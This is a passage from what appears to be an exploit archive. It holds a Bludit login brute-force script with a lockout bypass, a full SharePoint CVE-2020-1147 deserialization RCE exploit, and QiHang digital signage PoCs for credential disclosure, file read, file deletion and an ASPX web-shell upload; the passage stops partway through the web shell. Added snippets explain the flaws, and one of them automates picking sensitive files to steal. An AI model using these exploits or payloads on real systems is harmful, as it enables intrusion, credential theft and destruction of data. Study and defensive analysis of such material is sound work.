    end
  end
end

def get_csrf(client, login_url)
  res = client.get(login_url)
  csrf_token = /input.+?name="tokenCSRF".+?value="(.+?)"/.match(res.body).captures[0]
end

def auth_ok?(res)
  HTTP::Status.redirect?(res.code) && %r{/admin/dashboard}.match?(res.headers['Location'])
end

def bruteforce_auth(client, host, username, wordlist)
  login_url = host + '/admin/login'
  File.foreach(wordlist).with_index do |password, i|
    password = password.chomp
    csrf_token = get_csrf(client, login_url)
    headers = {
      'X-Forwarded-For' => "#{i}-#{password[..4]}",
    }
    data = {
      'tokenCSRF' => csrf_token,
      'username' => username,
      'password' => password,
    }
    puts "[*] Trying password: #{password}"
    auth_res = client.post(login_url, data, headers)
    if auth_ok?(auth_res)
      puts "\n[+] Password found: #{password}"
      break
    end
  end
end

doc = <<~DOCOPT
  Bludit <= 3.9.2 - Authentication Bruteforce Mitigation Bypass

  Usage:
    #{__FILE__} -r <url> -u <username> -w <path> [--debug]
    #{__FILE__} -H | --help

  Options:
    -r <url>, --root-url <url>          Root URL (base path) including HTTP scheme, port and root folder
    -u <username>, --user <username>    Username of the admin
    -w <path>, --wordlist <path>        Path to the wordlist file
    --debug                             Display arguments
    -H, --help                          Show this screen

  Examples:
    #{__FILE__} -r http://example.org -u admin -w myWordlist.txt
    #{__FILE__} -r https://example.org:8443/bludit -u john -w /usr/share/wordlists/password/rockyou.txt
DOCOPT

begin
  args = Docopt.docopt(doc)
  pp args if args['--debug']
  clnt = HTTPClient.new
  bruteforce_auth(clnt, args['--root-url'], args['--user'], args['--wordlist'])
rescue Docopt::Exit => e
  puts e.message
end
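The bypass in the post works because the lockout counter is keyed on a client-controlled header: every attempt carries a fresh `X-Forwarded-For`, so no key ever reaches the threshold. The following is an added example, not Bludit's code or the post's script, that models both designs side by side: a throttle keyed on `X-Forwarded-For` and one keyed on the socket peer address plus the username, each fed the same attempt sequence the script above generates. The threshold, wordlist and peer address are constructed for the example.

```python
from collections import defaultdict

MAX_ATTEMPTS = 10  # constructed threshold; Bludit's own value is not given in the post


class LoginThrottle:
    """Counts failed logins per key and blocks once the threshold is reached.

    trust_xff=True reproduces the weak design: the key is whatever the client
    sent in X-Forwarded-For, so rotating that header defeats the lockout.
    trust_xff=False keys on the TCP peer address and the username instead.
    (Behind a reverse proxy, use the address the proxy itself reports, never
    the raw header as received from the client.)"""

    def __init__(self, trust_xff, max_attempts=MAX_ATTEMPTS):
        self.trust_xff = trust_xff
        self.max_attempts = max_attempts
        self.failures = defaultdict(int)

    def _key(self, peer_ip, headers, username):
        if self.trust_xff and "X-Forwarded-For" in headers:
            return headers["X-Forwarded-For"]
        return (peer_ip, username.lower())

    def is_blocked(self, peer_ip, headers, username):
        return self.failures[self._key(peer_ip, headers, username)] >= self.max_attempts

    def record_failure(self, peer_ip, headers, username):
        self.failures[self._key(peer_ip, headers, username)] += 1


def simulate_bruteforce(throttle, wordlist, real_password, peer_ip="203.0.113.5"):
    """Replay the post's attempt pattern against a throttle: one login per word,
    each with a new X-Forwarded-For of the form '<index>-<first 5 chars>'.
    Returns (password found or None, number of attempts the server accepted)."""
    attempts = 0
    for i, password in enumerate(wordlist):
        headers = {"X-Forwarded-For": "%d-%s" % (i, password[:5])}
        if throttle.is_blocked(peer_ip, headers, "admin"):
            return None, attempts
        attempts += 1
        if password == real_password:
            return password, attempts
        throttle.record_failure(peer_ip, headers, "admin")
    return None, attempts


# Constructed wordlist; the "real" password sits at index 29 (30th attempt).
WORDLIST = ["password%d" % n for n in range(50)]
REAL_PASSWORD = "password29"

if __name__ == "__main__":
    print("XFF-keyed lockout: ", simulate_bruteforce(LoginThrottle(trust_xff=True), WORDLIST, REAL_PASSWORD))
    print("peer+user lockout: ", simulate_bruteforce(LoginThrottle(trust_xff=False), WORDLIST, REAL_PASSWORD))
```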
-
Microsoft SharePoint Server 2019 - Remote Code Execution
# Exploit Title: Microsoft SharePoint Server 2019 - Remote Code Execution
# Google Dork: inurl:quicklinks.aspx
# Date: 2020-08-14
# Exploit Author: West Shepherd
# Vendor Homepage: https://www.microsoft.com
# Version: SharePoint Enterprise Server 2013 Service Pack 1, SharePoint Enterprise Server 2016, SharePoint Server 2010 Service Pack 2, SharePoint Server 2019
# Tested on: Windows 2016
# CVE : CVE-2020-1147
# Credit goes to Steven Seeley and Soroush Dalili
# Source: https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html

#!/usr/bin/python
from sys import argv, exit, stdout, stderr
import argparse
import logging
import requests
from bs4 import BeautifulSoup
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from requests_ntlm import HttpNtlmAuth


class Exploit:
    # To generate the gadget use:
    # ysoserial.exe -g TypeConfuseDelegate -f LosFormatter -c "command"
    # ysoserial.exe -g TextFormattingRunProperties -f LosFormatter -c "command"
    gadget = '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'

    control_path_quicklinks = '/_layouts/15/quicklinks.aspx'
    control_path_quicklinksdialogform = '/_layouts/15/quicklinksdialogform.aspx'
    control_path = control_path_quicklinks

    def __init__(self, redirect=False, proxy_address='', username='',
                 domain='', password='', target=''):
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        self.username = '%s\\%s' % (domain, username)
        self.target = target
        self.password = password
        self.session = requests.session()
        self.redirect = redirect
        self.timeout = 0.5
        self.proxies = {
            'http': 'http://%s' % proxy_address,
            'https': 'http://%s' % proxy_address
        } if proxy_address else {}
        self.headers = {}
        self.query_params = {'Mode': 'Suggestion'}
        # __SUGGESTIONSCACHE__ is the form field quicklinks.aspx feeds to DataSet.ReadXml()
        self.form_values = {'__viewstate': '', '__SUGGESTIONSCACHE__': ''}
        self.cookies = {}
        # DataSet schema whose column type is an ExpandedWrapper<LosFormatter, ObjectDataProvider>;
        # ReadXml() instantiates it and ObjectDataProvider calls LosFormatter.Deserialize(gadget)
        self.payload = """\
<DataSet>
  <xs:schema xmlns="" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" id="somedataset">
    <xs:element name="somedataset" msdata:IsDataSet="true" msdata:UseCurrentLocale="true">
      <xs:complexType>
        <xs:choice minOccurs="0" maxOccurs="unbounded">
          <xs:element name="Exp_x0020_Table">
            <xs:complexType>
              <xs:sequence>
                <xs:element name="pwn" msdata:DataType="System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.LosFormatter, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" type="xs:anyType" minOccurs="0"/>
              </xs:sequence>
            </xs:complexType>
          </xs:element>
        </xs:choice>
      </xs:complexType>
    </xs:element>
  </xs:schema>
  <diffgr:diffgram xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" xmlns:diffgr="urn:schemas-microsoft-com:xml-diffgram-v1">
    <somedataset>
      <Exp_x0020_Table diffgr:id="Exp Table1" msdata:rowOrder="0" diffgr:hasChanges="inserted">
        <pwn xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
          <ExpandedElement/>
          <ProjectedProperty0>
            <MethodName>Deserialize</MethodName>
            <MethodParameters>
              <anyType xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xsi:type="xsd:string">{GADGET}</anyType>
            </MethodParameters>
            <ObjectInstance xsi:type="LosFormatter"></ObjectInstance>
          </ProjectedProperty0>
        </pwn>
      </Exp_x0020_Table>
    </somedataset>
  </diffgr:diffgram>
</DataSet>""".replace('{GADGET}', self.gadget)

    def do_get(self, url, params=None, data=None):
        return self.session.get(
            url=url, verify=False, allow_redirects=self.redirect,
            headers=self.headers, cookies=self.cookies, proxies=self.proxies,
            data=data, params=params,
            auth=HttpNtlmAuth(self.username, self.password))

    def do_post(self, url, data=None, params=None):
        return self.session.post(
            url=url, data=data, verify=False, allow_redirects=self.redirect,
            headers=self.headers, cookies=self.cookies, proxies=self.proxies,
            params=params,
            auth=HttpNtlmAuth(self.username, self.password))

    def parse_page(self, content):
        # Collect the hidden form fields we know about from the rendered page
        soup = BeautifulSoup(content, 'lxml')
        for key in list(self.form_values.keys()):
            try:
                for tag in soup.select('input[name=%s]' % key):
                    try:
                        self.form_values[key] = tag['value']
                    except Exception as error:
                        stderr.write('error for key %s error %s\n' % (key, str(error)))
            except Exception as error:
                stderr.write('error for selector %s error %s\n' % (key, str(error)))
        return self

    def debug(self):
        try:
            import http.client as http_client
        except ImportError:
            import httplib as http_client
        http_client.HTTPConnection.debuglevel = 1
        logging.basicConfig()
        logging.getLogger().setLevel(logging.DEBUG)
        requests_log = logging.getLogger("requests.packages.urllib3")
        requests_log.setLevel(logging.DEBUG)
        requests_log.propagate = True
        return self

    def clean(self, payload):
        # Collapse the pretty-printed XML onto a single line
        payload = payload.replace('\n', '').replace('\r', '')
        while '  ' in payload:
            payload = payload.replace('  ', ' ')
        return payload

    def get_form(self):
        url = '%s%s' % (self.target, self.control_path)
        resp = self.do_get(url=url, params=self.query_params)
        self.parse_page(content=resp.content)
        return resp

    def send_payload(self):
        url = '%s%s' % (self.target, self.control_path)
        # self.get_form()
        self.headers['Content-Type'] = 'application/x-www-form-urlencoded'
        self.form_values['__SUGGESTIONSCACHE__'] = self.clean(self.payload)
        self.form_values['__viewstate'] = ''
        resp = self.do_post(url=url, params=self.query_params, data=self.form_values)
        return resp


if __name__ == '__main__':
    parser = argparse.ArgumentParser(add_help=True, description='CVE-2020-1147 SharePoint exploit')
    try:
        parser.add_argument('-target', action='store', help='Target address: http(s)://target.com ')
        parser.add_argument('-username', action='store', default='', help='Username to use: first.last')
        parser.add_argument('-domain', action='store', default='', help='User domain to use: domain.local')
        parser.add_argument('-password', action='store', default='', help='Password to use: Summer2020')
        # store_true: the original used action='store', so any value (even "False") enabled the flag
        parser.add_argument('-both', action='store_true', default=False,
                            help='Try both pages (quicklinks.aspx and quicklinksdialogform.aspx)')
        parser.add_argument('-debug', action='store_true', default=False, help='Enable debugging')
        parser.add_argument('-proxy', action='store', default='', help='Enable proxy: 10.10.10.10:8080')
        if len(argv) == 1:
            parser.print_help()
            exit(1)
        options = parser.parse_args()
        exp = Exploit(proxy_address=options.proxy, username=options.username,
                      domain=options.domain, password=options.password,
                      target=options.target)
        if options.debug:
            exp.debug()
        stdout.write('target %s username %s domain %s password %s debug %s proxy %s\n' % (
            options.target, options.username, options.domain, options.password,
            options.debug, options.proxy))
        result = exp.send_payload()
        stdout.write('Response: %d\n' % result.status_code)
        if 'MicrosoftSharePointTeamServices' in result.headers:
            stdout.write('Version: %s\n' % result.headers['MicrosoftSharePointTeamServices'])
        if options.both and result.status_code != 200:
            exp.control_path = exp.control_path_quicklinksdialogform
            stdout.write('Trying alternate page\n')
            result = exp.send_payload()
            stdout.write('Response: %d\n' % result.status_code)
    except Exception as error:
        stderr.write('error in main %s' % str(error))
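The exploit above works because DataSet.ReadXml() instantiates whatever CLR type the inline schema names in msdata:DataType; the fix Microsoft shipped is a type check before deserialization. The following is an added example, not part of the exploit or of SharePoint: a small audit that walks a DataSet document and reports every column whose msdata:DataType is not a primitive. The allow-list and the two sample documents are constructed for this example (the second one reuses the ExpandedWrapper type string from the payload above).

```python
import xml.etree.ElementTree as ET

MSDATA_NS = "urn:schemas-microsoft-com:xml-msdata"
DATATYPE_ATTR = "{%s}DataType" % MSDATA_NS

# Primitive CLR types a DataSet column may legitimately carry (assumed allow-list;
# extend it for your own schemas, but never with types that have side effects
# on construction or property set).
ALLOWED_TYPES = {
    "System.Boolean", "System.Byte", "System.Char", "System.DateTime",
    "System.Decimal", "System.Double", "System.Guid", "System.Int16",
    "System.Int32", "System.Int64", "System.SByte", "System.Single",
    "System.String", "System.TimeSpan", "System.UInt16", "System.UInt32",
    "System.UInt64", "System.Byte[]",
}


def type_name(datatype):
    """Strip the assembly qualification from an assembly-qualified type name.

    'Ns.Type, Asm, Version=...' -> 'Ns.Type'. Commas inside [...] belong to
    generic arguments (ExpandedWrapper`2[[...],[...]]) and are not the cut
    point, so the generic arguments stay attached to the name."""
    depth = 0
    for i, ch in enumerate(datatype):
        if ch == "[":
            depth += 1
        elif ch == "]":
            depth -= 1
        elif ch == "," and depth == 0:
            return datatype[:i].strip()
    return datatype.strip()


def audit_dataset_xml(xml_text):
    """Return (column name, declared type) for every schema element whose
    msdata:DataType names something outside ALLOWED_TYPES."""
    root = ET.fromstring(xml_text)
    findings = []
    for el in root.iter():
        declared = el.get(DATATYPE_ATTR)
        if declared is None:
            continue
        name = type_name(declared)
        if name not in ALLOWED_TYPES:
            findings.append((el.get("name"), name))
    return findings


# Constructed sample: an ordinary DataSet with one Int32 column.
BENIGN_DATASET = """<DataSet>
<xs:schema xmlns="" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" id="ds">
 <xs:element name="ds" msdata:IsDataSet="true">
  <xs:complexType><xs:choice minOccurs="0" maxOccurs="unbounded">
   <xs:element name="Row"><xs:complexType><xs:sequence>
    <xs:element name="id" msdata:DataType="System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" type="xs:int" minOccurs="0"/>
    <xs:element name="label" type="xs:string" minOccurs="0"/>
   </xs:sequence></xs:complexType></xs:element>
  </xs:choice></xs:complexType>
 </xs:element>
</xs:schema>
<diffgr:diffgram xmlns:diffgr="urn:schemas-microsoft-com:xml-diffgram-v1"><ds><Row><id>1</id><label>ok</label></Row></ds></diffgr:diffgram>
</DataSet>"""

# Constructed sample: same document with the column retyped to the wrapper the exploit uses.
WRAPPER_DATASET = BENIGN_DATASET.replace(
    'name="id" msdata:DataType="System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"',
    'name="pwn" msdata:DataType="System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.LosFormatter, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"')

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_DATASET), ("wrapper", WRAPPER_DATASET)):
        print(label, audit_dataset_xml(doc))
```

Run it over a captured __SUGGESTIONSCACHE__ value (after URL-decoding) to decide whether a request is worth escalating; anything that names a generic or an ExpandedWrapper is never a legitimate DataSet column.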
-
QiHang Media Web Digital Signage 3.0.9 - Cleartext Credential Disclosure
# Exploit Title: QiHang Media Web Digital Signage 3.0.9 - Cleartext Credential Disclosure
# Date: 2020-08-12
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.howfor.com
# Tested on: Microsoft Windows Server 2012 R2 Datacenter
# CVE : N/A

QiHang Media Web (QH.aspx) Digital Signage 3.0.9 Cleartext Credentials Disclosure

Vendor: Shenzhen Xingmeng Qihang Media Co., Ltd.
        Guangzhou Hefeng Automation Technology Co., Ltd.
Product web page: http://www.howfor.com
Affected version: 3.0.9.0

Summary: Digital Signage Software.

Desc: The application suffers from a cleartext credentials disclosure vulnerability that allows an unauthenticated attacker to issue a request to an unprotected directory hosting the XML file '/xml/User/User.xml' and obtain administrative login information, which allows a successful authentication bypass.

Tested on: Microsoft Windows Server 2012 R2 Datacenter
           Microsoft Windows Server 2003 Enterprise Edition
           ASP.NET 4.0.30319
           HowFor Web Server/5.6.0.0
           Microsoft ASP.NET Web QiHang IIS Server

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2020-5579
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5579.php

27.07.2020

--

$ curl http://192.168.1.1/xml/User/User.xml
<?xml version="1.0" encoding="utf-8"?>
<Users>
  <User id="1" account="admin" password="admin" />
  <User id="2" account="dev" password="dev" />
</Users>
-
QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Disclosure
# Exploit Title: QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Disclosure
# Date: 2020-08-12
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.howfor.com
# Tested on: Microsoft Windows Server 2012 R2 Datacenter
# CVE : N/A

QiHang Media Web (QH.aspx) Digital Signage 3.0.9 Arbitrary File Disclosure Vulnerability

Vendor: Shenzhen Xingmeng Qihang Media Co., Ltd.
        Guangzhou Hefeng Automation Technology Co., Ltd.
Product web page: http://www.howfor.com
Affected version: 3.0.9.0

Summary: Digital Signage Software.

Desc: The application suffers from an unauthenticated file disclosure vulnerability: input passed through the 'fileName' parameter of the download (and view) action, or through the 'path' parameter of the getAll action, is not properly verified before being used. This can be exploited to disclose the contents of files and directories on the local file system.

Tested on: Microsoft Windows Server 2012 R2 Datacenter
           Microsoft Windows Server 2003 Enterprise Edition
           ASP.NET 4.0.30319
           HowFor Web Server/5.6.0.0
           Microsoft ASP.NET Web QiHang IIS Server

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2020-5581
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5581.php

27.07.2020

--

Source code disclosure PoC:
---------------------------

GET /QH.aspx?responderId=ResourceNewResponder&action=download&fileName=.%2fQH.aspx HTTP/1.1
Host: 192.168.1.74:8090
User-Agent: lfi_test.wrapper/2.9
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

--

HTTP/1.1 200 OK
Server: HowFor Web Server/5.6.0.0
Date: Sun, 26 Jul 2020 22:49:08 GMT
X-AspNet-Version: 4.0.30319
Content-Disposition: attachment;filename=QH.aspx
Set-Cookie: ASP.NET_SessionId=f0xji5cazmbzdygcr5g3qr03; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: application/zip
Content-Length: 463
Connection: Close

<%@ Page Language="C#" ValidateRequest="false" AutoEventWireup="true" CodeBehind="QH.aspx.cs" Inherits="QiHang.Media.Web.QH" %>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <title></title>
</head>
<body>
    <form id="form1" runat="server">
    <div>
    </div>
    </form>
</body>
</html>

Arbitrary file read:
--------------------

http://192.168.1.74:8090/QH.aspx?responderId=ResourceNewResponder&action=download&fileName=.%2fGlobal.asax
http://192.168.1.74:8090/QH.aspx?responderId=ResourceNewResponder&action=view&fileName=.%2fWeb.config

Directory contents disclosure:
------------------------------

POST /QH.aspx HTTP/1.1
Host: 192.168.1.74:8090
Content-Length: 62
User-Agent: lfi_test.wrapper/2.9
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

responderId=ResourceNewResponder&action=getAll&path=&fileName=

--

HTTP/1.1 200 OK
Server: HowFor Web Server/5.6.0.0
Date: Tue, 28 Jul 2020 23:51:13 GMT
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=f0ac1jyifcacvufnpptduv1f; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 4680
Connection: Close

{ "first": true, "second": [
  { "name": "App_Data", "type": "folder", "size": 852992.0, "uploadTime": new Date( 1525316885250 ), "path": "/App_Data" },
  { "name": "bin", "type": "folder", "size": 4398172.0, "uploadTime": new Date( 1525316885046 ),
  ...
  ...
  "name": "xml", "type": "folder", "size": 25519.0, "uploadTime": new Date( 1525316885234 ), "path": "/xml" },
  { "name": "default.htm", "type": ".htm", "size": 1609.0, "uploadTime": new Date( 1523859040000 ), "path": "/default.htm" },
  { "name": "Global.asax", "type": ".asax", "size": 100.0, "uploadTime": new Date( 1523859032000 ), "path": "/Global.asax" },
  { "name": "IIS.dll", "type": ".dll", "size": 40960.0, "uploadTime": new Date( 1523859036000 ),
  ...
  ...
  "path": "/Media.Server.DeamonPlugin.Web.xml" },
  { "name": "preview.htm", "type": ".htm", "size": 947.0, "uploadTime": new Date( 1523859040000 ), "path": "/preview.htm" },
  { "name": "QH.aspx", "type": ".aspx", "size": 463.0, "uploadTime": new Date( 1523859030000 ), "path": "/QH.aspx" },
  { "name": "server.xml", "type": ".xml", "size": 206.0, "uploadTime": new Date( 1523859034000 ), "path": "/server.xml" },
  { "name": "Web.config", "type": ".config", "size": 2470.0, "uploadTime": new Date( 1523859034000 ), "path": "/Web.config" }
], "third": 0 }
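The getAll response above is a JavaScript object literal rather than JSON (uploadTime is a `new Date(...)` call), so json.loads() rejects it as-is. The following is an added example, not part of the advisory: it normalises that response into structured entries, picks out the files that usually hold credentials or connection strings, and builds the fileName value the download action expects. The sample listing is constructed from the entries shown above; the suffix list is an assumption.

```python
import json
import re
from datetime import datetime, timezone
from urllib.parse import quote

# Constructed sample, trimmed to four of the entries the advisory shows.
SAMPLE_LISTING = """{ "first": true, "second": [
 { "name": "App_Data", "type": "folder", "size": 852992.0, "uploadTime": new Date( 1525316885250 ), "path": "/App_Data" },
 { "name": "xml", "type": "folder", "size": 25519.0, "uploadTime": new Date( 1525316885234 ), "path": "/xml" },
 { "name": "Global.asax", "type": ".asax", "size": 100.0, "uploadTime": new Date( 1523859032000 ), "path": "/Global.asax" },
 { "name": "Web.config", "type": ".config", "size": 2470.0, "uploadTime": new Date( 1523859034000 ), "path": "/Web.config" }
 ], "third": 0 }"""

# The only non-JSON construct: a JavaScript Date built from milliseconds since the epoch.
_JS_DATE = re.compile(r"new Date\(\s*(\d+)\s*\)")


def parse_listing(body):
    """Convert a getAll response into a list of dicts.

    "first" is the success flag, "second" the entries, "third" an unused
    counter. Rewriting new Date(N) to the bare integer N makes the rest valid
    JSON, and the integer is then turned into an aware datetime."""
    doc = json.loads(_JS_DATE.sub(r"\1", body))
    if not doc.get("first"):
        return []
    entries = []
    for item in doc.get("second", []):
        entries.append({
            "name": item["name"],
            "path": item["path"],
            "is_dir": item["type"] == "folder",
            "size": int(item["size"]),
            "uploaded": datetime.fromtimestamp(item["uploadTime"] / 1000.0, tz=timezone.utc),
        })
    return entries


# Assumed list of extensions that tend to hold secrets in an ASP.NET web root
# (the advisories above show User.xml and Web.config being exposed).
SENSITIVE_SUFFIXES = (".config", ".asax", ".xml")


def sensitive_files(entries):
    """Return the file entries (folders excluded) worth retrieving first."""
    return [e for e in entries
            if not e["is_dir"] and e["name"].lower().endswith(SENSITIVE_SUFFIXES)]


def download_param(path):
    """Build the fileName value for action=download: the advisory prefixes the
    web-root-relative path with '.' and percent-encodes the slash."""
    return quote("." + path, safe="")


if __name__ == "__main__":
    for entry in sensitive_files(parse_listing(SAMPLE_LISTING)):
        print(entry["path"], entry["size"], entry["uploaded"].isoformat(),
              "-> fileName=" + download_param(entry["path"]))
```

Feed a real response body into parse_listing() and the getAll 'path' parameter into subsequent calls to walk subdirectories; the same parser handles each level because the shape of the response does not change.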
-
QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Deletion
# Exploit Title: QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Deletion
# Date: 2020-08-12
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.howfor.com
# Tested on: Microsoft Windows Server 2012 R2 Datacenter
# CVE : N/A

QiHang Media Web (QH.aspx) Digital Signage 3.0.9 Unauthenticated Arbitrary File Deletion

Vendor: Shenzhen Xingmeng Qihang Media Co., Ltd.
        Guangzhou Hefeng Automation Technology Co., Ltd.
Product web page: http://www.howfor.com
Affected version: 3.0.9.0

Summary: Digital Signage Software.

Desc: Input passed to the 'data' parameter in 'QH.aspx' for the delete action is not properly sanitised before being used to delete files. This can be exploited by an unauthenticated attacker to delete files with the permissions of the web server, using either an absolute path or directory traversal sequences passed within the affected POST parameter.

Tested on: Microsoft Windows Server 2012 R2 Datacenter
           Microsoft Windows Server 2003 Enterprise Edition
           ASP.NET 4.0.30319
           HowFor Web Server/5.6.0.0
           Microsoft ASP.NET Web QiHang IIS Server

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2020-5580
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5580.php

27.07.2020

--

POST /QH.aspx HTTP/1.1
Host: 192.168.1.74:8090
Content-Length: 105
User-Agent: Eraser
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Origin: http://192.168.1.74:8090
Referer: http://192.168.1.74:8090/index.htm
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

responderId=ResourceNewResponder&action=delete&data=["/opt/resources/Billboard.jpg"]
-
QiHang Media Web Digital Signage 3.0.9 - Remote Code Execution (Unauthenticated)
# Exploit Title: QiHang Media Web Digital Signage 3.0.9 - Remote Code Execution (Unauthenticated)
# Date: 2020-08-12
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.howfor.com
# Tested on: Microsoft Windows Server 2012 R2 Datacenter
# CVE : N/A

<!--
QiHang Media Web (QH.aspx) Digital Signage 3.0.9 (pre-auth) Remote Code Execution

Vendor: Shenzhen Xingmeng Qihang Media Co., Ltd.
        Guangzhou Hefeng Automation Technology Co., Ltd.
Product web page: http://www.howfor.com
Affected version: 3.0.9.0

Summary: Digital Signage Software.

Desc: The application suffers from an unauthenticated remote code execution vulnerability. It is caused by a lack of verification when uploading files through QH.aspx: the uploaded file can be written to any location by using the 'remotePath' parameter to traverse directories. By abusing the upload action and the 'fileToUpload' parameter, an unauthenticated attacker can upload a malicious ASPX script and execute system commands.

Tested on: Microsoft Windows Server 2012 R2 Datacenter
           Microsoft Windows Server 2003 Enterprise Edition
           ASP.NET 4.0.30319
           HowFor Web Server/5.6.0.0
           Microsoft ASP.NET Web QiHang IIS Server

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2020-5582
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5582.php

27.07.2020
-->

<html>
<body>
<script>
function uploadShellPoC() {
  var xhr = new XMLHttpRequest();
  xhr.open("POST", "http:\/\/192.168.1.74:8090\/QH.aspx", true);
  xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundaryhbcZX7o0Hw19h3kr");
  xhr.setRequestHeader("Accept", "*\/*");
  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9");
  xhr.withCredentials = true;
  // multipart body: the ASPX web shell as fileToUpload, then action, responderId and remotePath
  var body = "------WebKitFormBoundaryhbcZX7o0Hw19h3kr\r\n" +
    "Content-Disposition: form-data; name=\"fileToUpload\"; filename=\"cmd.aspx\"\r\n" +
    "Content-Type: application/octet-stream\r\n" +
    "\r\n" +
    "\x3c%@ Page Language=\"VB\" Debug=\"true\" %\x3e\r\n" +
    "\x3c%@ import Namespace=\"system.IO\" %\x3e\r\n" +
    "\x3c%@ import Namespace=\"System.Diagnostics\" %\x3e\r\n" +
    "\r\n" +
    "\x3cscript runat=\"server\"\x3e\r\n" +
    "\r\n" +
    "Sub RunCmd(Src As Object, E As EventArgs)\r\n" +
    "  Dim myProcess As New Process()\r\n" +
    "  Dim myProcessStartInfo As New ProcessStartInfo(xpath.text)\r\n" +
    "  myProcessStartInfo.UseShellExecute = false\r\n" +
    "  myProcessStartInfo.RedirectStandardOutput = true\r\n" +
    "  myProcess.StartInfo = myProcessStartInfo\r\n" +
    "  myProcessStartInfo.Arguments=xcmd.text\r\n" +
    "  myProcess.Start()\r\n" +
    "\r\n" +
    "  Dim myStreamReader As StreamReader = myProcess.StandardOutput\r\n" +
    "  Dim myString As String = myStreamReader.Readtoend()\r\n" +
    "  myProcess.Close()\r\n" +
    "  mystring=replace(mystring,\"\x3c\",\"<\")\r\n" +
    "  mystring=replace(mystring,\"\x3e\",\">\")\r\n" +
    "  result.text= vbcrlf & \"\x3cpre\x3e\" & mystring & \"\x3c/pre\x3e\"\r\n" +
    "End Sub\r\n" +
    "\r\n" +
    "\x3c/script\x3e\r\n" +
    "\r\n" +
    "\x3chtml\x3e\r\n" +
    "\x3cbody\x3e\r\n" +
    "\x3cform runat=\"server\"\x3e\r\n" +
    "\x3cp\x3e\x3casp:Label id=\"L_p\" runat=\"server\" width=\"80px\"\x3eProgram\x3c/asp:Label\x3e\r\n" +
    "\x3casp:TextBox id=\"xpath\" runat=\"server\" Width=\"300px\"\x3ec:\\windows\\system32\\cmd.exe\x3c/asp:TextBox\x3e\r\n" +
    "\x3cp\x3e\x3casp:Label id=\"L_a\" runat=\"server\" width=\"80px\"\x3eArguments\x3c/asp:Label\x3e\r\n" +
    "\x3casp:TextBox id=\"xcmd\" runat=\"server\" Width=\"300px\" Text=\"/c net user\"\x3e/c net user\x3c/asp:TextBox\x3e\r\n" +
    "\x3cp\x3e\x3casp:Button id=\"Button\" onclick=\"runcmd\" runat=\"server\" Width=\"100px\" Text=\"Run\"\x3e\x3c/asp:Button\x3e\r\n" +
    "\x3cp\x3e\x3casp:Label id=\"result\" runat=\"server\"\x3e\x3c/asp:Label\x3e\r\n" +
